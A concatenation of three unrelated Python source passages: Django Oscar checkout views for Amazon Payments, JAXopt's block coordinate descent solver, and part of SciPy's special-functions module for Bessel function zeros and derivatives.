kwargs = super(AmazonShippingAddressView, self).get_context_data(
**kwargs)
kwargs.update(self.get_amazon_payments_context_vars())
return kwargs
def get(self, request, **kwargs):
ctx = self.get_context_data(**kwargs)
return self.render_to_response(ctx)
def post(self, request, *args, **kwargs):
amazon_order_details = self.get_amazon_order_details(
request, validate_payment_details=False)
if amazon_order_details:
# Get shipping address
amazon_shipping_address = amazon_order_details.Destination\
.PhysicalDestination
address_fields = dict(
first_name=amazon_shipping_address.Name.text,
line1=amazon_shipping_address.AddressLine1.text,
line4=amazon_shipping_address.City.text,
state=amazon_shipping_address.StateOrRegion.text,
postcode=amazon_shipping_address.PostalCode.text,
country_id=amazon_shipping_address.CountryCode.text,
)
if amazon_shipping_address.AddressLine2:
address_fields["line2"] = amazon_shipping_address.AddressLine2\
.text
self.checkout_session.ship_to_new_address(address_fields)
return redirect("checkout:amazon-payments-shipping-method")
ctx = self.get_context_data()
return self.render_to_response(ctx)
class AmazonShippingMethodView(AmazonCheckoutView, ShippingMethodView):
def get(self, request, *args, **kwargs):
# These pre-conditions can't easily be factored out into the normal
# pre-conditions as they do more than run a test and then raise an
# exception if it fails.
# Check that shipping is required at all
if not request.basket.is_shipping_required():
# No shipping required - we store a special code to indicate so.
self.checkout_session.use_shipping_method(
NoShippingRequired().code)
return self.get_success_response()
# Check that shipping address has been completed
if not self.checkout_session.is_shipping_address_set():
messages.error(request, _("Please choose a shipping address"))
return http.HttpResponseRedirect(
reverse('checkout:amazon-payments-shipping-address'))
# Save shipping methods as instance var as we need them both here
# and when setting the context vars.
self._methods = self.get_available_shipping_methods()
if len(self._methods) == 0:
# No shipping methods available for given address
messages.warning(request, _(
"Shipping is unavailable for your chosen address - please "
"choose another"))
return http.HttpResponseRedirect(
reverse('checkout:amazon-payments-shipping-address'))
elif len(self._methods) == 1:
# Only one shipping method - set this and redirect onto the next
# step
self.checkout_session.use_shipping_method(self._methods[0].code)
return self.get_success_response()
# Must be more than one available shipping method, we present them to
# the user to make a choice.
return super(ShippingMethodView, self).get(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
# Need to check that this code is valid for this user
method_code = request.POST.get('method_code', None)
is_valid = False
for method in self.get_available_shipping_methods():
if method.code == method_code:
is_valid = True
if not is_valid:
messages.error(request, _("Your submitted shipping method is not"
" permitted"))
return http.HttpResponseRedirect(
reverse('checkout:amazon-payments-shipping-method'))
# Save the code for the chosen shipping method in the session
# and continue to the next step.
self.checkout_session.use_shipping_method(method_code)
return self.get_success_response()
def get_success_response(self):
return redirect(reverse('checkout:amazon-payments-payment-method'))
class AmazonPaymentMethodView(AmazonCheckoutView, PaymentMethodView):
def get_success_response(self):
return redirect(reverse('checkout:amazon-payments-payment-details'))
class BaseAmazonPaymentDetailsView(AmazonCheckoutView, PaymentDetailsView ):
def dispatch(self, *args, **kwargs):
if not self.init_amazon_payments():
messages.error(self.request,
_("Please click on the 'Pay with Amazon' button to "
"begin the Amazon checkout process."))
return redirect('basket:summary')
return super(BaseAmazonPaymentDetailsView, self).dispatch(
*args, **kwargs)
def set_order_details(self, total, order_id=None):
data = {
"AmazonOrderReferenceId": self.session.order_reference_id,
"OrderReferenceAttributes.OrderTotal.Amount": total,
"OrderReferenceAttributes.OrderTotal.CurrencyCode": (
settings.AMAZON_PAYMENTS_CURRENCY)
}
if order_id:
data[
"OrderReferenceAttributes.SellerOrderAttributes.SellerOrderId"
] = order_id
self.api.do_request("SetOrderReferenceDetails", data,
False, self.save_to_db_callback)
def handle_automatic_payments_agreement(self):
"""
Confirms and validates billing agreement to enable automatic payments.
"""
try:
self.api.do_request(
"ConfirmBillingAgreement",
{"AmazonBillingAgreementId": (
self.session.billing_agreement_id)},
False, self.save_to_db_callback)
except self.api.exception_class, e:
if e.args[0] != "BillingAgreementConstraintsExist":
raise
else:
self.api.do_request(
"ValidateBillingAgreement",
{"AmazonBillingAgreementId": (
self.session.billing_agreement_id)},
False, self.save_to_db_callback)
def handle_payment(self, order_number, total, **kwargs):
self.set_order_details(total.incl_tax, order_number)
auth_attempt = self.session.auth_attempts.create()
auth_ref = "%s-%s" % (auth_attempt.pk,
auth_attempt.created_at.strftime("%s"))
try:
authorization_id, tx = self.api.authorize(
self.session.order_reference_id, auth_ref, total.incl_tax,
settings.AMAZON_PAYMENTS_CURRENCY,
callback=self.save_to_db_callback)
except self.api.exception_class, e:
raise PaymentError(*e.args)
auth_attempt.authorization_id = authorization_id
auth_attempt.transaction = tx
auth_attempt.save()
try:
auth_status, captured_amount = self.api.get_authorization_status(
auth_attempt.authorization_id,
callback=self.save_to_db_callback)
except self.api.exception_class, e:
raise PaymentError(*e.args)
if auth_status.State.text == "Declined":
if auth_status.ReasonCode.text in ["InvalidPaymentMethod",
"AmazonRejected"]:
raise UnableToTakePayment(_(
"The payment was rejected by Amazon. Please update the "
"payment method, or choose another method."))
else:
raise PaymentError(auth_status.State.text,
auth_status.ReasonCode.text)
elif (auth_status.State.text == "Closed" and
auth_status.ReasonCode.text != "MaxCapturesProcessed"):
raise PaymentError(auth_status.State.text,
auth_status.ReasonCode.text)
source_type = SourceType.objects.get_or_create(
name="Amazon Payments")[0]
source = Source(
source_type=source_type,
currency="USD",
amount_allocated=captured_amount,
amount_debited=captured_amount,
reference=auth_attempt.authorization_id)
self.add_payment_source(source)
self.add_payment_event("Purchase", total.incl_tax,
reference=auth_attempt.authorization_id)
def handle_successful_order(self, order):
response = super(BaseAmazonPaymentDetailsView, self)\
.handle_successful_order(order)
if getattr(self.request.basket, "has_subscriptions", False):
# Set up automatic future payments. Should not affect current
# order.
try:
self.handle_automatic_payments_agreement()
except self.api.exception_class, e:
logger.error(
"Unable to set up automatic payments for order %s: %s" % (
order, e))
self.session.order = order
self.session.save()
return response
class AmazonPaymentDetailsView(BaseAmazonPaymentDetailsView):
template_name = 'amazon_payments/payment_details.html'
template_name_preview = 'amazon_payments/preview.html'
def get_context_data(self, **kwargs):
kwargs = super(AmazonPaymentDetailsView, self).get_context_data(
**kwargs)
kwargs.update(self.get_amazon_payments_context_vars())
return kwargs
def post(self, request, *args, **kwargs):
if request.POST.get('action', '') == 'place_order':
return self.handle_place_order_submission(request)
return self.handle_payment_details_submission(request)
def handle_payment_details_submission(self, request):
# Check if shipping address and payment method have been selected
amazon_order_details = self.get_amazon_order_details(self.request)
if not amazon_order_details:
return redirect("checkout:amazon-payments-payment-details")
if not self.session.order_reference_id:
basket = self.request.basket
shipping_address = self.get_shipping_address(basket)
shipping_method = self.get_shipping_method(
basket, shipping_address)
total = self.get_order_totals(
basket, shipping_method=shipping_method)
try:
order_reference_id = self.api.create_order_reference_id(
self.session.billing_agreement_id, total.incl_tax,
settings.AMAZON_PAYMENTS_CURRENCY,
callback=self.save_to_db_callback,
order_id="1%s" % basket.id)
except self.api.exception_class:
messages.error(self.request, _(
"An error occurred when processing your payment. "
"Please try again later."))
return redirect("checkout:amazon-payments-payment-details")
self.session.order_reference_id = order_reference_id
self.session.save()
return redirect("checkout:amazon-payments-preview")
def handle_place_order_submission(self, request):
amazon_order_details = self.get_amazon_order_details(self.request)
if not amazon_order_details:
return redirect("checkout:amazon-payments-preview")
return super(AmazonPaymentDetailsView, self)\
.handle_place_order_submission(request)
# VIEWS FOR ONE-STEP CHECKOUT
class AmazonOneStepLoginRedirectView(AmazonLoginRedirectView):
_redirect_url = reverse_lazy('checkout:amazon-payments-onestep')
class AmazonOneStepPaymentDetailsView(
ShippingMethodMixin, BaseAmazonPaymentDetailsView):
template_name = 'amazon_payments/onestep_checkout.html'
pre_conditions = (
'check_basket_is_not_empty',
'check_basket_is_valid',)
def get_default_shipping_method(self, basket):
return Repository().get_default_shipping_method(
user=self.request.user, basket=basket,
request=self.request)
def get(self, request, *args, **kwargs):
if request.basket.is_empty:
messages.error(request, _("You need to add some items to your"
" basket to checkout"))
return redirect('basket:summary')
context = self.get_context_data()
return render_to_response(self.template_name, context)
def handle_payment(self, order_number, total, **kwargs):
if not self.session.order_reference_id:
try:
order_reference_id = self.api.create_order_reference_id(
self.session.billing_agreement_id, total.incl_tax,
settings.AMAZON_PAYMENTS_CURRENCY,
callback=self.save_to_db_callback,
order_id=order_number
)
except self.api.exception_class, e:
raise PaymentError(*e.args)
self.session.order_reference_id = order_reference_id
self.session.save()
# We've already checked for valid shipping address and
# payment details in the post() method
super(AmazonOneStepPaymentDetailsView, self).handle_payment(
order_number, total, **kwargs)
def post(self, request, *args, **kwargs):
if request.basket.is_empty:
msg = _("You need to add some items to your basket to check out.")
elif 'place_order' in request.POST:
try:
amazon_order_details = self.get_amazon_order_details(request)
except AmazonPaymentsAPIError, e:
logger.debug(unicode(e))
if e.args[0] == "InvalidAddressConsentToken":
msg = _("Your session has expired. Please sign in again by"
" clicking on the 'Pay with Amazon' button.")
else:
msg = _("Sorry, there's a problem processing your order "
"via Amazon. Please try again later.")
messages.error(request, msg)
return redirect("basket:summary")
if not amazon_order_details:
return redirect(request.path)
# Get shipping address
amazon_shipping_address = amazon_order_details.Destination\
.PhysicalDestination
shipping_address = ShippingAddress(
first_name=amazon_shipping_address.Name.text,
line1=amazon_shipping_address.AddressLine1.text,
line4=amazon_shipping_address.City.text,
state=amazon_shipping_address.StateOrRegion.text,
postcode=amazon_shipping_address.PostalCode.text,
country=Country.objects.get(
iso_3166_1_a2=amazon_shipping_address.CountryCode.text),
)
if amazon_shipping_address.AddressLine2:
shipping_address.line2 = amazon_shipping_address.AddressLine2\
.text
shipping_method = self.get_current_shipping_method(
request.basket)
order_total = self.get_order_totals(
request.basket,
shipping_method=shipping_method)
if request.basket.is_shipping_required() and \
shipping_address.country.pk not in [country.pk for country in \
shipping_method.countries.all()]:
countries = ", ".join([country.pk for country in \
shipping_method.countries.all()])
message=_("We do not yet ship to countries outside of: {}.".format(
countries))
messages.error(request, _(message))
return redirect('checkout:amazon-payments-onestep')
request.basket.calculate_tax(shipping_address)
submission = self.build_submission(
user=request.user, shipping_method=shipping_method,
order_total=order_total, shipping_address=shipping_address)
if (not request.user.is_authenticated() and
not self.checkout_session.get_guest_email()):
submission['order_kwargs']['guest_email'] = (
amazon_order_details.Buyer.Email.text)
result = self.submit(**submission)
return result
amazon_error_code = request.POST.get("amazon_error_code")
amazon_error_message = request.POST.get("amazon_error_message")
if amazon_error_code in ["BuyerSessionExpired", "BuyerNotAssociated",
"StaleOrderReference"]:
msg = ("Your session has expired. Please sign in again by "
"clicking on the 'Pay with Amazon' button.")
else:
msg = ("Sorry, there's a problem processing your order via Amazon."
" Please try again later.")
if amazon_error_code or amazon_error_message:
logger.debug("Amazon widget error response: %s (code: %s)" % (
amazon_error_code, amazon_error_message))
logger.debug(msg)
messages.error(request, _(msg))
return redirect("basket:summary")
def get_context_data(self, **kwargs):
kwargs = RequestContext(self.request, kwargs)
kwargs['basket'] = self.request.basket
method = self.get_current_shipping_method(self.request.basket)
kwargs['shipping_method'] = method
kwargs['order_total'] = self.get_order_totals(
self.request.basket, method)
kwargs.update(self.get_amazon_payments_context_vars())
return kwargs
def render_preview(self, request, **kwargs):
self.preview = False
ctx = self.get_context_data(**kwargs)
return self.render_to_response(ctx)
def build_submission(self, **kwargs):
"""
Return a dict of data to submitted to pay for, and create an order
"""
basket = kwargs.get('basket', self.request.basket)
shipping_address = kwargs['shipping_address']
shipping_method = kwargs['shipping_method']
if not self.get_shipping_address(basket):
if oscar_version_changed:
raise EnvironmentError("You aren't using the proper version of oscar! Delete the build_submission function.")
logger.warning(
'Expected Oscar version to changed, but it didnt with basket #{}.'.format(
oscar.VERSION
)
)
total = self.get_order_totals(
basket, shipping_method=shipping_method)
submission = {
'user': self.request.user,
'basket': basket,
'shipping_address': shipping_address,
'shipping_method': shipping_method,
'order_total': total,
'order_kwargs': {},
'payment_kwargs': {}}
if not submission['user'].is_authenticated():
email = self.checkout_session.get_guest_email()
submission['order_kwargs']['guest_email'] = email
return submission
class AmazonUpdateTaxesAndShippingView(ShippingMethodMixin, BaseAmazonPaymentDetailsView):
template_name = 'amazon_payments/onestep_checkout.html'
pre_conditions = (
'check_basket_is_not_empty',
'check_basket_is_valid',
)
def get_default_shipping_method(self, basket):
return Repository().get_default_shipping_method(
user=self.request.user, basket=basket,
request=self.request)
def post(self, request, *args, **kwargs):
data = {
"msg": "",
"status": "error"
}
if request.basket.is_empty:
data['msg'] = _("You need to add some items to your basket to check out.")
else:
try:
amazon_order_details = self.get_amazon_order_details(request, validate_payment_details=False)
except AmazonPaymentsAPIError, e:
logger.debug(unicode(e))
if e.args[0] == "InvalidAddressConsentToken":
data['msg'] = _("Your session has expired. Please sign in again by"
" clicking on the 'Pay with Amazon' button.")
else:
data['msg'] = _("Sorry, there's a problem processing your order "
"via Amazon. Please try again later.")
return HttpResponse(
simplejson.dumps(data),
mimetype="application/json",
status=428
)
if not amazon_order_details:
data['msg'] = _("There no amazon details")
return HttpResponse(
simplejson.dumps(data),
mimetype="application/json",
status=428
)
# Get shipping address
amazon_shipping_address = amazon_order_details.Destination\
.PhysicalDestination
shipping_address = ShippingAddress(
first_name=amazon_shipping_address.Name.text,
line1=amazon_shipping_address.AddressLine1.text,
line4=amazon_shipping_address.City.text,
state=amazon_shipping_address.StateOrRegion.text,
postcode=amazon_shipping_address.PostalCode.text,
country=Country.objects.get(
iso_3166_1_a2=amazon_shipping_address.CountryCode.text),
)
if amazon_shipping_address.AddressLine2:
shipping_address.line2 = amazon_shipping_address.AddressLine2\
.text
shipping_method = self.get_current_shipping_method(request.basket)
if shipping_address.country.pk not in [country.pk for country in \
shipping_method.countries.all()]:
countries = ", ".join([country.pk for country in \
shipping_method.countries.all()])
message=_("We do not yet ship to countries outside of: {}.".format(
countries))
# messages.error(self.request, _(message))
return HttpResponse(
simplejson.dumps({"error": message}),
mimetype="application/json",
status=428
)
request.basket.calculate_tax(
shipping_address
)
shipping = shipping_method.charge_excl_tax
taxes = request.basket.total_tax
data = {
"status": "ok",
"msg": "success",
"taxes": "$"+str(taxes),
"total": "$"+str(request.basket.total_incl_tax + shipping),
"shipping": "$"+str(shipping),
}
return HttpResponse(
simplejson.dumps(data),
mimetype="application/json"
)
| |
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of block coordinate descent in JAX."""
import inspect
from typing import Any
from typing import Callable
from typing import NamedTuple
from typing import Optional
from typing import Union
from dataclasses import dataclass
import jax
import jax.numpy as jnp
from jaxopt._src import base
from jaxopt._src import implicit_diff as idf
from jaxopt._src import loop
from jaxopt._src import objective
from jaxopt._src import tree_util
class BlockCDState(NamedTuple):
"""Named tuple containing state information."""
iter_num: int
error: float
predictions: jnp.ndarray
subfun_g: jnp.ndarray
@dataclass(eq=False)
class BlockCoordinateDescent(base.IterativeSolver):
"""Block coordinate solver.
This solver minimizes::
objective(params, hyperparams_prox, *args, **kwargs) =
fun(params, *args, **kwargs) + non_smooth(params, hyperparams_prox)
Attributes:
fun: a smooth function of the form ``fun(params, *args, **kwargs)``.
It should be a ``objective.CompositeLinearFunction`` object.
block_prox: block-wise proximity operator associated with ``non_smooth``,
a function of the form ``block_prox(x[j], hyperparams_prox, scaling=1.0)``.
See ``jaxopt.prox`` for examples.
maxiter: maximum number of proximal gradient descent iterations.
tol: tolerance to use.
verbose: whether to print error on every iteration or not.
Warning: verbose=True will automatically disable jit.
implicit_diff: whether to enable implicit diff or autodiff of unrolled
iterations.
implicit_diff_solve: the linear system solver to use.
jit: whether to JIT-compile the optimization loop (default: "auto").
unroll: whether to unroll the optimization loop (default: "auto").
"""
fun: objective.CompositeLinearFunction
block_prox: Callable
maxiter: int = 500
tol: float = 1e-4
verbose: int = 0
implicit_diff: bool = True
implicit_diff_solve: Optional[Callable] = None
jit: base.AutoOrBoolean = "auto"
unroll: base.AutoOrBoolean = "auto"
def init_state(self,
init_params: Any,
hyperparams_prox: Any,
*args,
**kwargs) -> BlockCDState:
"""Initialize the solver state.
Args:
init_params: pytree containing the initial parameters.
hyperparams_prox: pytree containing hyperparameters of block_prox.
*args: additional positional arguments to be passed to ``fun``.
**kwargs: additional keyword arguments to be passed to ``fun``.
Returns:
state
"""
del hyperparams_prox # Not used.
linop = self.fun.make_linop(*args, **kwargs)
predictions = linop.matvec(init_params)
subfun_g = self._grad_subfun(predictions, *args, **kwargs)
return BlockCDState(iter_num=jnp.asarray(0),
predictions=predictions,
subfun_g=subfun_g,
error=jnp.asarray(jnp.inf))
def update(self,
params: Any,
state: NamedTuple,
hyperparams_prox: Any,
*args,
**kwargs) -> base.OptStep:
"""Performs one epoch of block CD.
Args:
params: pytree containing the parameters.
state: named tuple containing the solver state.
hyperparams_prox: pytree containing hyperparameters of block_prox.
*args: additional positional arguments to be passed to ``fun``.
**kwargs: additional keyword arguments to be passed to ``fun``.
Returns:
(params, state)
"""
linop = self.fun.make_linop(*args, **kwargs)
stepsizes = 1.0 / self.fun.columnwise_lipschitz_const(*args, **kwargs)
# todo: ability to permute block order.
def body_fun(i, tup):
x, subfun_g, predictions, sqerror_sum = tup
x_i_old = x[i]
g_i = linop.rmatvec_element(subfun_g, i)
b = self.fun.b(*args, **kwargs)
if b is not None:
g_i += b[i]
x_i_new = self.block_prox(x[i] - stepsizes[i] * g_i,
hyperparams_prox,
stepsizes[i])
diff_i = x_i_new - x_i_old
# A cheap-to-compute lower-bound of self.l2_optimality_error.
sqerror_sum += jnp.sum(diff_i ** 2)
x = x.at[i].set(x_i_new)
predictions = linop.update_matvec(predictions, diff_i, i)
subfun_g = self._grad_subfun(predictions, *args, **kwargs)
return x, subfun_g, predictions, sqerror_sum
init = (params, state.subfun_g, state.predictions, 0)
params, subfun_g, predictions, sqerror_sum = jax.lax.fori_loop(
lower=0, upper=params.shape[0], body_fun=body_fun, init_val=init)
state = BlockCDState(iter_num=state.iter_num + 1,
predictions=predictions,
subfun_g=subfun_g,
error=jnp.sqrt(sqerror_sum))
return base.OptStep(params=params, state=state)
def _fixed_point_fun(self, params, hyperparams_prox, *args, **kwargs):
grad_step = params - self._grad_fun(params, *args, **kwargs)
return self._prox(grad_step, hyperparams_prox)
def optimality_fun(self,
params: Any,
hyperparams_prox: Any,
*args,
**kwargs) -> Any:
"""Proximal-gradient fixed point residual.
This function is compatible with ``@custom_root``.
The fixed point function is defined as::
fixed_point_fun(params, hyperparams_prox, *args, **kwargs) =
prox(params - grad(fun)(params, *args, **kwargs), hyperparams_prox)
where::
prox = jax.vmap(block_prox, in_axes=(0, None))
The residual is defined as::
optimality_fun(params, hyperparams_prox, *args, **kwargs) =
fixed_point_fun(params, hyperparams_prox, *args, **kwargs) - params
Args:
params: pytree containing the parameters.
hyperparams_prox: pytree containing hyperparameters of block_prox.
*args: additional positional arguments to be passed to ``fun``.
**kwargs: additional keyword arguments to be passed to ``fun``.
Returns:
residual: pytree with same structure as ``params``.
"""
fp = self._fixed_point_fun(params, hyperparams_prox, *args, **kwargs)
return fp - params
def __post_init__(self):
if not isinstance(self.fun, objective.CompositeLinearFunction):
raise AttributeError("fun should be an instance of "
"objective.CompositeLinearFunction.")
# Pre-compile useful functions.
self._grad_fun = jax.grad(self.fun)
self._grad_subfun = jax.grad(self.fun.subfun)
self._prox = jax.vmap(self.block_prox, in_axes=(0, None))
# Sets up reference signature.
signature = inspect.signature(self.fun.subfun)
parameters = list(signature.parameters.values())
new_param = inspect.Parameter(name="hyperparams_prox",
kind=inspect.Parameter.POSITIONAL_OR_KEYWORD)
parameters.insert(1, new_param)
self.reference_signature = inspect.Signature(parameters)
| |
#
# Author: Travis Oliphant, 2002
#
from __future__ import division, print_function, absolute_import
import numpy as np
from scipy.lib.six import xrange
from numpy import pi, asarray, floor, isscalar, iscomplex, real, imag, sqrt, \
where, mgrid, cos, sin, exp, place, seterr, issubdtype, extract, \
less, vectorize, inexact, nan, zeros, sometrue, atleast_1d
from ._ufuncs import ellipkm1, mathieu_a, mathieu_b, iv, jv, gamma, psi, zeta, \
hankel1, hankel2, yv, kv, gammaln, ndtri, errprint
from . import _ufuncs
import types
from . import specfun
from . import orthogonal
import warnings
__all__ = ['agm', 'ai_zeros', 'assoc_laguerre', 'bei_zeros', 'beip_zeros',
'ber_zeros', 'bernoulli', 'berp_zeros', 'bessel_diff_formula',
'bi_zeros', 'clpmn', 'digamma', 'diric', 'ellipk', 'erf_zeros', 'erfcinv',
'erfinv', 'errprint', 'euler', 'fresnel_zeros',
'fresnelc_zeros', 'fresnels_zeros', 'gamma', 'gammaln', 'h1vp',
'h2vp', 'hankel1', 'hankel2', 'hyp0f1', 'iv', 'ivp', 'jn_zeros',
'jnjnp_zeros', 'jnp_zeros', 'jnyn_zeros', 'jv', 'jvp', 'kei_zeros',
'keip_zeros', 'kelvin_zeros', 'ker_zeros', 'kerp_zeros', 'kv',
'kvp', 'lmbda', 'lpmn', 'lpn', 'lqmn', 'lqn', 'mathieu_a',
'mathieu_b', 'mathieu_even_coef', 'mathieu_odd_coef', 'ndtri',
'obl_cv_seq', 'pbdn_seq', 'pbdv_seq', 'pbvv_seq',
'polygamma', 'pro_cv_seq', 'psi', 'riccati_jn', 'riccati_yn',
'sinc', 'sph_harm', 'sph_in', 'sph_inkn',
'sph_jn', 'sph_jnyn', 'sph_kn', 'sph_yn', 'y0_zeros', 'y1_zeros',
'y1p_zeros', 'yn_zeros', 'ynp_zeros', 'yv', 'yvp', 'zeta',
'SpecialFunctionWarning']
class SpecialFunctionWarning(Warning):
pass
warnings.simplefilter("always", category=SpecialFunctionWarning)
def sinc(x):
"""Returns sin(pi*x)/(pi*x) at all points of array x.
"""
x = asarray(x)
w = pi * x
# w might contain 0, and so temporarily turn off warnings
# while calculating sin(w)/w.
old_settings = seterr(all='ignore')
s = sin(w) / w
seterr(**old_settings)
return where(x == 0, 1.0, s)
def diric(x,n):
"""Returns the periodic sinc function, also called the Dirichlet function:
diric(x) = sin(x *n / 2) / (n sin(x / 2))
where n is a positive integer.
"""
x,n = asarray(x), asarray(n)
n = asarray(n + (x-x))
x = asarray(x + (n-n))
if issubdtype(x.dtype, inexact):
ytype = x.dtype
else:
ytype = float
y = zeros(x.shape,ytype)
mask1 = (n <= 0) | (n != floor(n))
place(y,mask1,nan)
z = asarray(x / 2.0 / pi)
mask2 = (1-mask1) & (z == floor(z))
zsub = extract(mask2,z)
nsub = extract(mask2,n)
place(y,mask2,pow(-1,zsub*(nsub-1)))
mask = (1-mask1) & (1-mask2)
xsub = extract(mask,x)
nsub = extract(mask,n)
place(y,mask,sin(nsub*xsub/2.0)/(nsub*sin(xsub/2.0)))
return y
def jnjnp_zeros(nt):
"""Compute nt (<=1200) zeros of the Bessel functions Jn and Jn'
and arange them in order of their magnitudes.
Returns
-------
zo[l-1] : ndarray
Value of the lth zero of of Jn(x) and Jn'(x). Of length `nt`.
n[l-1] : ndarray
Order of the Jn(x) or Jn'(x) associated with lth zero. Of length `nt`.
m[l-1] : ndarray
Serial number of the zeros of Jn(x) or Jn'(x) associated
with lth zero. Of length `nt`.
t[l-1] : ndarray
0 if lth zero in zo is zero of Jn(x), 1 if it is a zero of Jn'(x). Of
length `nt`.
See Also
--------
jn_zeros, jnp_zeros : to get separated arrays of zeros.
"""
if not isscalar(nt) or (floor(nt) != nt) or (nt > 1200):
raise ValueError("Number must be integer <= 1200.")
nt = int(nt)
n,m,t,zo = specfun.jdzo(nt)
return zo[1:nt+1],n[:nt],m[:nt],t[:nt]
def jnyn_zeros(n,nt):
"""Compute nt zeros of the Bessel functions Jn(x), Jn'(x), Yn(x), and
Yn'(x), respectively. Returns 4 arrays of length nt.
See jn_zeros, jnp_zeros, yn_zeros, ynp_zeros to get separate arrays.
"""
if not (isscalar(nt) and isscalar(n)):
raise ValueError("Arguments must be scalars.")
if (floor(n) != n) or (floor(nt) != nt):
raise ValueError("Arguments must be integers.")
if (nt <= 0):
raise ValueError("nt > 0")
return specfun.jyzo(abs(n),nt)
def jn_zeros(n,nt):
"""Compute nt zeros of the Bessel function Jn(x).
"""
return jnyn_zeros(n,nt)[0]
def jnp_zeros(n,nt):
"""Compute nt zeros of the Bessel function Jn'(x).
"""
return jnyn_zeros(n,nt)[1]
def yn_zeros(n,nt):
"""Compute nt zeros of the Bessel function Yn(x).
"""
return jnyn_zeros(n,nt)[2]
def ynp_zeros(n,nt):
"""Compute nt zeros of the Bessel function Yn'(x).
"""
return jnyn_zeros(n,nt)[3]
def y0_zeros(nt,complex=0):
"""Returns nt (complex or real) zeros of Y0(z), z0, and the value
of Y0'(z0) = -Y1(z0) at each zero.
"""
if not isscalar(nt) or (floor(nt) != nt) or (nt <= 0):
raise ValueError("Arguments must be scalar positive integer.")
kf = 0
kc = (complex != 1)
return specfun.cyzo(nt,kf,kc)
def y1_zeros(nt,complex=0):
"""Returns nt (complex or real) zeros of Y1(z), z1, and the value
of Y1'(z1) = Y0(z1) at each zero.
"""
if not isscalar(nt) or (floor(nt) != nt) or (nt <= 0):
raise ValueError("Arguments must be scalar positive integer.")
kf = 1
kc = (complex != 1)
return specfun.cyzo(nt,kf,kc)
def y1p_zeros(nt,complex=0):
"""Returns nt (complex or real) zeros of Y1'(z), z1', and the value
of Y1(z1') at each zero.
"""
if not isscalar(nt) or (floor(nt) != nt) or (nt <= 0):
raise ValueError("Arguments must be scalar positive integer.")
kf = 2
kc = (complex != 1)
return specfun.cyzo(nt,kf,kc)
def bessel_diff_formula(v, z, n, L, phase):
# from AMS55.
# L(v,z) = J(v,z), Y(v,z), H1(v,z), H2(v,z), phase = -1
# L(v,z) = I(v,z) or exp(v*pi*i)K(v,z), phase = 1
# For K, you can pull out the exp((v-k)*pi*i) into the caller
p = 1.0
s = L(v-n, z)
for i in xrange(1, n+1):
p = phase * (p * (n-i+1)) / i # = choose(k, i)
s += p*L(v-n + i*2, z)
return s / (2.**n)
def jvp(v,z,n=1):
"""Return the nth derivative of Jv(z) with respect to z.
"""
if not isinstance(n,int) or (n < 0):
raise ValueError("n must be a non-negative integer.")
if n == 0:
return jv(v,z)
else:
return bessel_diff_formula(v, z, n, jv, -1)
# return (jvp(v-1,z,n-1) - jvp(v+1,z,n-1))/2.0
def yvp(v,z,n=1):
"""Return the nth derivative of Yv(z) with respect to z.
"""
if not isinstance(n,int) or (n < 0):
raise ValueError("n must be a non-negative integer.")
if n == 0:
return yv(v,z)
else:
return bessel_diff_formula(v, z, n, yv, -1)
# return (yvp(v-1,z,n-1) - yvp(v+1,z,n-1))/2.0
def kvp(v,z,n=1):
"""Return the nth derivative of Kv(z) with respect to z.
"""
if not isinstance(n,int) or (n < 0):
raise ValueError("n must be a non-negative integer.")
if n == 0:
return kv(v,z)
else:
return (-1)**n * bessel_diff_formula(v, z, n, kv, 1)
def ivp(v,z,n=1):
"""Return the nth derivative of Iv(z) with respect to z.
"""
if not isinstance(n,int) or (n < 0):
raise ValueError("n must be a non-negative integer.")
if n == 0:
return iv(v,z)
else:
return bessel_diff_formula(v, z, n, iv, 1)
def h1vp(v,z,n=1):
"""Return the nth derivative of H1v(z) with respect to z.
"""
if not isinstance(n,int) or (n < 0):
raise ValueError("n must be a non-negative integer.")
if n == 0:
return hankel1(v,z)
else:
return bessel_diff_formula(v, z, n, hankel1, -1)
# return (h1vp(v-1,z,n-1) - h1vp(v+1,z,n-1))/2.0
def h2vp(v,z,n=1):
"""Return the nth derivative of H2v(z) with respect to z.
"""
if not isinstance(n,int) or (n < 0):
raise ValueError("n must be a non-negative integer.")
if n == 0:
return hankel2(v,z)
else:
return bessel_diff_formula(v, z, n, hankel2, -1)
# return (h2vp(v-1,z,n-1) - h2vp(v+1,z,n-1))/2.0
def sph_jn(n,z):
"""Compute the spherical Bessel function jn(z) and its derivative for
all orders up to and including n.
"""
if not (isscalar(n) and isscalar(z)):
raise ValueError("arguments must be scalars.")
if (n != floor(n)) or (n < 0):
raise ValueError("n must be a non-negative integer.")
if (n < 1):
n1 = 1
else:
n1 = n
if iscomplex(z):
nm,jn,jnp,yn,ynp = specfun.csphjy(n1,z)
else:
nm,jn,jnp = specfun.sphj(n1,z)
return jn[:(n+1)], jnp[:(n+1)]
def sph_yn(n,z):
"""Compute the spherical Bessel function yn(z) and its derivative for
all orders up to and including n.
"""
if not (isscalar(n) and isscalar(z)):
raise ValueError("arguments must be scalars.")
if (n != floor(n)) or (n < 0):
raise ValueError("n must be a non-negative integer.")
if (n < 1):
n1 = 1
else:
n1 = n
if iscomplex(z) or less(z,0):
nm,jn,jnp,yn,ynp = specfun.csphjy(n1,z)
else:
nm,yn,ynp = specfun.sphy(n1,z)
return yn[:(n+1)], ynp[:(n+1)]
def sph_jnyn(n,z):
"""Compute the spherical Bessel functions, jn(z) and yn(z) and their
derivatives for all orders up to and including n.
"""
if not (isscalar(n) and isscalar(z)):
raise ValueError("arguments must be scalars.")
if (n != floor(n)) or (n < 0):
raise ValueError("n must be a non-negative integer.")
if (n < 1):
n1 = 1
else:
n1 = n
if iscomplex(z) or less(z,0):
nm,jn,jnp,yn,ynp = specfun.csphjy(n1,z)
else:
nm,yn,ynp = specfun.sphy(n1,z)
nm,jn,jnp = specfun.sphj(n1,z)
return jn[:(n+1)],jnp[:(n+1)],yn[:(n+1)],ynp[:(n+1)]
def sph_in(n,z):
"""Compute the spherical Bessel function in(z) and its derivative for
all orders up to and including n.
"""
if not (isscalar(n) and isscalar(z)):
raise ValueError("arguments must be scalars.")
if (n != floor(n)) or (n < 0):
raise ValueError("n must be a non-negative integer.")
if (n < 1):
n1 = 1
else:
